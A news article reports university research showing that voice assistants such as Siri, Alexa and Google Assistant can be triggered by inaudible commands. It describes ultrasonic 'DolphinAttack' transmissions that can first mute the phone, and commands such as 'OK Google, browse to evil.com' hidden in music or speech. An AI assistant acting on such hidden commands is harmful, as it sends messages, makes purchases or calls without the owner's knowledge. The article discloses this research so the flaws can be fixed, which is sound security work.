Your Smart Assistant Can Take Silent Commands Inaudible to Your Ear

Share

At university labs, researchers have been using commands to activate the most significant artificial intelligence systems on smartphones and smart speakers. Major smart speaker manufacturers like Amazon, Google and Apple say that they have safeguards in place to prevent their assistants from being hijacked. It turns out, anything that can be spoken to is also prone to subliminal messaging.

The microphones and software that runs assistants such as Alexa and Google Now can pick up frequencies above 20Khz, which is the limit of the audible range for human ears.

Now the technology is racing even further ahead of the law.

Researchers in China previous year demonstrated that ultrasonic transmissions could trigger popular voice assistants such as Siri or Alexa, in a method known as 'DolphinAttack'.

Latest research claims that these vulnerabilities could leverage inaudible commands at a frequency beyond human ability to launch attacks such as sending messages, making purchases, and so on, all without the user realizing it. One method called DolphinAttack even muted the target phone before issuing inaudible commands, so the owner wouldn't hear the device's responses. While the commands couldn't penetrate walls, they could control smart devices through open windows from outside a building. The group provided samples of songs where voice commands have been embedded to make digital assistants do specific things, including visiting websites, turning on Global Positioning System, and making phone calls. They were able to hide the command, "OK Google, browse to evil.com" in a recording of the spoken sentence, 'Without the dataset, the article is useless.' Humans can not detect the command. Some of those Berkeley researchers, however, have now claimed in a research paper that hidden commands can be embedded into music tracks or spoken text.

What these research studies prove is that it's possible to manipulate speech recognition gadgets by making minute changes to speech or other audio files.

Over the past two years, researchers have worked within university labs on hidden commands that only Siri, Alexa, and Google Assistant will pick up, and not humans. How device makers respond will differ, especially as they balance security easily of use.

Mr Carlini said he was confident that in time he and his colleagues could mount successful adversarial attacks against any smart device system on the market.

'We want to demonstarte that it's possible and then hope that other people will say, OK this is possible, now let's try and fix it, ' Nicholas Carlini, who co-led the study, told the Times.

Share